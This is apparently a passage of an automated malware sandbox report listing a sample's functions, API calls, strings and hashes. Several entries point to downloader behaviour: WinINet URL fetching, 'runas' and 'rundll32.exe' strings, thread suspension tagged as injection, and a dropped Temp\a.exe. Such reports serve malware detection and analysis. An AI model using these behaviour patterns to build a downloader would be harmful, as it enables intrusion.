
                                          Uniqueness Score: -1.00%

                                          Function 01015F52, Relevance: .0, Instructions: 22COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 22c8ee549e0e701cc67c10f8b31497336b99bd38d043062465dd4583a8c5f113
                                          • Instruction ID: d2b23d4ed7399cff2ec37f3693be31a637520f248734b650c72817f1145a81c4
                                          • Opcode Fuzzy Hash: 22c8ee549e0e701cc67c10f8b31497336b99bd38d043062465dd4583a8c5f113
                                          • Instruction Fuzzy Hash: 41E08C32911228EBCB24DBDCC904D8AF7FCEB8AB40B11009AF601D3110C274DE00C7D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101CB2C, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 0101CB70
                                            • Part of subcall function 0101C709: _free.LIBCMT ref: 0101C726
                                            • Part of subcall function 0101C709: _free.LIBCMT ref: 0101C738
                                            • Part of subcall function 0101C709: _free.LIBCMT ref: 0101C74A
                                            • Part of subcall function 0101C709: _free.LIBCMT ref: 0101C75C
                                            • Part of subcall function 0101C709: _free.LIBCMT ref: 0101C76E
                                            • Part of subcall function 0101C709: _free.LIBCMT ref: 0101C780
                                            • Part of subcall function 0101C709: _free.LIBCMT ref: 0101C792
                                            • Part of subcall function 0101C709: _free.LIBCMT ref: 0101C7A4
                                            • Part of subcall function 0101C709: _free.LIBCMT ref: 0101C7B6
                                            • Part of subcall function 0101C709: _free.LIBCMT ref: 0101C7C8
                                            • Part of subcall function 0101C709: _free.LIBCMT ref: 0101C7DA
                                            • Part of subcall function 0101C709: _free.LIBCMT ref: 0101C7EC
                                            • Part of subcall function 0101C709: _free.LIBCMT ref: 0101C7FE
                                          • _free.LIBCMT ref: 0101CB65
                                            • Part of subcall function 01016601: HeapFree.KERNEL32(00000000,00000000,?,010156FE), ref: 01016617
                                            • Part of subcall function 01016601: GetLastError.KERNEL32(?,?,010156FE), ref: 01016629
                                          • _free.LIBCMT ref: 0101CB87
                                          • _free.LIBCMT ref: 0101CB9C
                                          • _free.LIBCMT ref: 0101CBA7
                                          • _free.LIBCMT ref: 0101CBC9
                                          • _free.LIBCMT ref: 0101CBDC
                                          • _free.LIBCMT ref: 0101CBEA
                                          • _free.LIBCMT ref: 0101CBF5
                                          • _free.LIBCMT ref: 0101CC2D
                                          • _free.LIBCMT ref: 0101CC34
                                          • _free.LIBCMT ref: 0101CC51
                                          • _free.LIBCMT ref: 0101CC69
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: 54417d586650fe36e4cf7de4811f864468859970f1328d1f3f3428102a54c514
                                          • Instruction ID: c0cae5b3522983e2f2126a4928aae050526de767ca190d2c050460683f25a216
                                          • Opcode Fuzzy Hash: 54417d586650fe36e4cf7de4811f864468859970f1328d1f3f3428102a54c514
                                          • Instruction Fuzzy Hash: E831AC71644306DFFB61AA78DE84B96B7E8FF04210F104869E0D8D7198DF7AE890DB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01002430, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 136networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 010024D1
                                          • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 010024E3
                                          • InternetReadFile.WININET(00000000,?,00032000,00032000), ref: 010024FA
                                          • InternetCloseHandle.WININET(00000000), ref: 0100250B
                                          • InternetCloseHandle.WININET(00000000), ref: 0100250E
                                          • InternetCloseHandle.WININET(00000000), ref: 0100251F
                                          • InternetCloseHandle.WININET(00000000), ref: 01002522
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Internet$CloseHandle$Open$FileRead
                                          • String ID: <$Microsoft Internet Explorer$runas
                                          • API String ID: 4294395943-436926838
                                          • Opcode ID: f951adf9b1a0d15927ee01f4cf207dddc471a00f15d3bd1a6810da36785726cb
                                          • Instruction ID: c7057522bf85580970103141551976f297ac5123dd4ca41cccb283a488682b0b
                                          • Opcode Fuzzy Hash: f951adf9b1a0d15927ee01f4cf207dddc471a00f15d3bd1a6810da36785726cb
                                          • Instruction Fuzzy Hash: 6D413A31E00219ABEB1ACF64CC84BEEBBB9EF55301F108159E555A72D1D739E640CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01005F80, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 401COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: (
                                          • API String ID: 0-3887548279
                                          • Opcode ID: 445ffcb0ce8e9e1e902278b7f833e0d31da0942fe2e1a516c1d70d38e148ca08
                                          • Instruction ID: 3d2cf121cfdc8e7626d0552b94edcbd9a8f0b14d8bf616beadeceed42f38457a
                                          • Opcode Fuzzy Hash: 445ffcb0ce8e9e1e902278b7f833e0d31da0942fe2e1a516c1d70d38e148ca08
                                          • Instruction Fuzzy Hash: F2F1F470A002099FFF25EFA8CC84BDEBBB2AF55304F504198E5496B2C6D7765A84CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01016DDA, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 0ad9ade5047e7312b4d4f4e2060c8d0c99f722058f47a546c1ce62e0b094d44b
                                          • Instruction ID: 2124e8d362ac428037bf679e64a03351ba4ae67af93a5739114950707464f24a
                                          • Opcode Fuzzy Hash: 0ad9ade5047e7312b4d4f4e2060c8d0c99f722058f47a546c1ce62e0b094d44b
                                          • Instruction Fuzzy Hash: EE21A576900109EFCB41EF94CC80DDEBBB9EF18341B0045A6FA559B124DB76EA54CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01010A40, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 01010A77
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 01010A7F
                                          • _ValidateLocalCookies.LIBCMT ref: 01010B08
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 01010B33
                                          • _ValidateLocalCookies.LIBCMT ref: 01010B88
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm$csm
                                          • API String ID: 1170836740-3733052814
                                          • Opcode ID: a9d26c106209ee588011920cb53b1a9437bae5d089a2b13635d5756a1dabb4fc
                                          • Instruction ID: 85af26bc01054cefe7b2e5af3287e6641d0c7d6f4b8af5acf54305b5f00a6f6a
                                          • Opcode Fuzzy Hash: a9d26c106209ee588011920cb53b1a9437bae5d089a2b13635d5756a1dabb4fc
                                          • Instruction Fuzzy Hash: 5751B134A00209DFCF24DF68C890A9EBBE5BF44314F1481A9F9C55B29DD779DA86CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101BF44, Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$___from_strstr_to_strchr
                                          • String ID:
                                          • API String ID: 3409252457-0
                                          • Opcode ID: 10b5b32bb25a81e0fd86a7722e0eb9c3f47cf8f7be393dd673f58d8a41130c6c
                                          • Instruction ID: 38ad7ed9c74338ee4e488cd4705ebad8e39d0f9e33699e56c120b8328fc21223
                                          • Opcode Fuzzy Hash: 10b5b32bb25a81e0fd86a7722e0eb9c3f47cf8f7be393dd673f58d8a41130c6c
                                          • Instruction Fuzzy Hash: B0510671984242AFFB21AFB889409FE7BE8AF06710F0445A9E6D497189EB7ED100CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01006C14, Relevance: 10.7, APIs: 7, Instructions: 247networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 01006C23
                                          • HttpSendRequestA.WININET(00000000,00000000,?), ref: 01006CCC
                                          • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 01006D5D
                                          • InternetReadFile.WININET(00000000,00000000,000003FF,?), ref: 01006DE4
                                          • InternetCloseHandle.WININET(00000000), ref: 01006DF5
                                          • InternetCloseHandle.WININET(?), ref: 01006DFA
                                          • InternetCloseHandle.WININET(?), ref: 01006DFF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Internet$CloseHandle$FileHttpReadRequest$OpenSend
                                          • String ID:
                                          • API String ID: 856522067-0
                                          • Opcode ID: 5ebb46b92edbce9d2df25c814aada14592c9a7cd2e66ff91d38dc5cbc1094237
                                          • Instruction ID: 1ed3080f8428443740ccd624b906b934ad456debf16869ec77d68be89a9a1e56
                                          • Opcode Fuzzy Hash: 5ebb46b92edbce9d2df25c814aada14592c9a7cd2e66ff91d38dc5cbc1094237
                                          • Instruction Fuzzy Hash: 6181F471A00109ABFB1ADF28CC84BEEBB66EF82310F244158F954D72D5D7369E908B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010171AC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 0-537541572
                                          • Opcode ID: 3a266ce320bad94088339ed4b14aff94a49a8223f170ca2003dc852d129c03fd
                                          • Instruction ID: 203339cd641764979637502d43cbe7ce67668f2577c0a793265c748aad02b9a1
                                          • Opcode Fuzzy Hash: 3a266ce320bad94088339ed4b14aff94a49a8223f170ca2003dc852d129c03fd
                                          • Instruction Fuzzy Hash: 27210D31E01221E7DB324E6C9C84EDE37D8AF557A0F210151FED6AB289D67CDD0286E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101C8A8, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0101C870: _free.LIBCMT ref: 0101C895
                                          • _free.LIBCMT ref: 0101C8F6
                                            • Part of subcall function 01016601: HeapFree.KERNEL32(00000000,00000000,?,010156FE), ref: 01016617
                                            • Part of subcall function 01016601: GetLastError.KERNEL32(?,?,010156FE), ref: 01016629
                                          • _free.LIBCMT ref: 0101C901
                                          • _free.LIBCMT ref: 0101C90C
                                          • _free.LIBCMT ref: 0101C960
                                          • _free.LIBCMT ref: 0101C96B
                                          • _free.LIBCMT ref: 0101C976
                                          • _free.LIBCMT ref: 0101C981
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
                                          • Instruction ID: b375fca317bc4804914575c0d9a4adccf8cae23a510f6bbadfd22d31f6979859
                                          • Opcode Fuzzy Hash: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
                                          • Instruction Fuzzy Hash: DC118E71590B05FAFA20BBB0CD85FCBB79DAF16710F400C24B6D9A6054EB7EF51586A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010046E0, Relevance: 9.5, APIs: 6, Instructions: 479COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?,?,?), ref: 0100470E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: PathTemp
                                          • String ID:
                                          • API String ID: 2920410445-0
                                          • Opcode ID: cebba7d2a33ab068a61bcd3321b113b9c697c069e6bd7de8914b6f58380e8bf8
                                          • Instruction ID: 43bbc97d6000e80c98b9723e1614c20464b88dfa0484bb05d25449e79f411917
                                          • Opcode Fuzzy Hash: cebba7d2a33ab068a61bcd3321b113b9c697c069e6bd7de8914b6f58380e8bf8
                                          • Instruction Fuzzy Hash: 51F1F330E0020AAFEF15EFA8DC84BEEBBB5EF44304F104199E555A72C4D7796A45CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01018457, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetConsoleCP.KERNEL32(?,01003D80,00000000), ref: 0101849F
                                          • __fassign.LIBCMT ref: 0101867E
                                          • __fassign.LIBCMT ref: 0101869B
                                          • WriteFile.KERNEL32(?,01003D80,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010186E3
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01018723
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 010187CF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                          • String ID:
                                          • API String ID: 4031098158-0
                                          • Opcode ID: b0356351bfc89e77dc379e21b1d4e8731cfad8f8751d84af90b2d6e5a7d49d0d
                                          • Instruction ID: 549d92249cb3da935f068921f6432924d50ec7d8aba8a2be1aed17c199a60a16
                                          • Opcode Fuzzy Hash: b0356351bfc89e77dc379e21b1d4e8731cfad8f8751d84af90b2d6e5a7d49d0d
                                          • Instruction Fuzzy Hash: EFD1CD75D002489FCB15CFE8C8809EDBBF5FF48310F28816AE895BB249D735AA06CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01010E44, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,01010E3B,01010CA9,010105B7), ref: 01010E52
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 01010E60
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01010E79
                                          • SetLastError.KERNEL32(00000000,01010E3B,01010CA9,010105B7), ref: 01010ECB
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 1ec94371108fc7ada0fd24f5ce8d2c3a4d41cfd45b2e5a2a4a269b31d4900850
                                          • Instruction ID: b3c9989d55a44fbdd804b5710afbe26bd1e247420fc35383516a222a43c82ad6
                                          • Opcode Fuzzy Hash: 1ec94371108fc7ada0fd24f5ce8d2c3a4d41cfd45b2e5a2a4a269b31d4900850
                                          • Instruction Fuzzy Hash: 0B01243260A3129EE679267A6D8899B6ADCEB15774F20022AF6D0800EDEF2F08414240
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01002890, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127threadsleepinjectionCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0100EF20: Concurrency::cancel_current_task.LIBCPMT ref: 0100F041
                                          • CreateThread.KERNEL32(00000000,00000000,01002820,00000000,00000000,00000000), ref: 010028F6
                                          • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,?), ref: 01002903
                                          • SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0100290A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
                                          • String ID: runas$rundll32.exe
                                          • API String ID: 1039963361-4081450877
                                          • Opcode ID: ae5ec296cbafa8449034475fa752194af902eb5e76c1b4fb2b1bd61e6e028b44
                                          • Instruction ID: 00d2672beb331f191731b80ff92067bc6a81f0f24741882f5c04cc05d182b093
                                          • Opcode Fuzzy Hash: ae5ec296cbafa8449034475fa752194af902eb5e76c1b4fb2b1bd61e6e028b44
                                          • Instruction Fuzzy Hash: 7641E431211249ABFB2ADF28CC88BDD3F56AF96360F548508FAD5972D5C73AD4C08B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101B498, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                          Download Yara Rule
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\a.exe, xrefs: 0101B49D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Users\user\AppData\Local\Temp\a.exe
                                          • API String ID: 0-2503798518
                                          • Opcode ID: 5c6876cbfccb1e0d924f6927900a2a85d4834bbf3d1c3af01ecb34d114122fe8
                                          • Instruction ID: 07fa524fedd9f3ba0493d11b792b5a4f5325cf6efaca4e869e4233ab813ece8c
                                          • Opcode Fuzzy Hash: 5c6876cbfccb1e0d924f6927900a2a85d4834bbf3d1c3af01ecb34d114122fe8
                                          • Instruction Fuzzy Hash: 1A21A172600206AFDB21AFA98C80EAB77BCEF103787104554FAA5D7148EB3CED00C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01012C0B, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _wcsrchr
                                          • String ID: .bat$.cmd$.com$.exe
                                          • API String ID: 1752292252-4019086052
                                          • Opcode ID: bcb92c0d2c4e828fcd8b1a6fc78f7bd3d21c007b92338bbffa69d748cc269a91
                                          • Instruction ID: aa9dde8ac03d24d79304cdc0a28acd7acfe835096c884ec6933f73d72bdcf1ee
                                          • Opcode Fuzzy Hash: bcb92c0d2c4e828fcd8b1a6fc78f7bd3d21c007b92338bbffa69d748cc269a91
                                          • Instruction Fuzzy Hash: 19014937A0832F253B54509EAD01A7667D98BE19B8735006FFFC4FB1C8EE8CD9421190
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01011154, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-
                                          • API String ID: 0-2084034818
                                          • Opcode ID: 679439a6ee2609dcef5fcd987ce3c87bef1fba978ee375f0cba82fb30dba401b
                                          • Instruction ID: 9f40ad089b4332fbc3edbbd6a779b9bd7aaec2389d0cfb513bbb4480af8ecad1
                                          • Opcode Fuzzy Hash: 679439a6ee2609dcef5fcd987ce3c87bef1fba978ee375f0cba82fb30dba401b
                                          • Instruction Fuzzy Hash: 9311B935A06225EBDB774EB89C44B5EB7989F067A0B200151EFC5A7299D638DD00C6E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01012203, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,010121F8,?,?,010121C0,?,?,?), ref: 01012218
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0101222B
                                          • FreeLibrary.KERNEL32(00000000,?,?,010121F8,?,?,010121C0,?,?,?), ref: 0101224E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: 3204d9b38524dc671ce22002a417dd8baf0b578365108399e93a2cef02f0a9f6
                                          • Instruction ID: 62d2d5fe8465066e7841d649d54e3f20392d810a5122f2c5156a43ac51164fee
                                          • Opcode Fuzzy Hash: 3204d9b38524dc671ce22002a417dd8baf0b578365108399e93a2cef02f0a9f6
                                          • Instruction Fuzzy Hash: F7F08C30601218FBEB71AF55DD0ABDEBEA8EF50755F2000A4F980A2154CB798A04DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101E774, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$InformationTimeZone
                                          • String ID:
                                          • API String ID: 597776487-0
                                          • Opcode ID: a55171b7364f142e38cc81edd8dba2f989fabe4339a80ea2c8f39b2358c46bbc
                                          • Instruction ID: 1a2abf0673bd0a2d6c81789d04585c89a9426becea56db78072a9c8bd3361e94
                                          • Opcode Fuzzy Hash: a55171b7364f142e38cc81edd8dba2f989fabe4339a80ea2c8f39b2358c46bbc
                                          • Instruction Fuzzy Hash: 39C14772A002069BDB26AF6CC844AEE7BEDBF56310F1440E9EDC5D7289E73D9A41C750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01003DDB, Relevance: 7.7, APIs: 5, Instructions: 202registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?), ref: 01003DF9
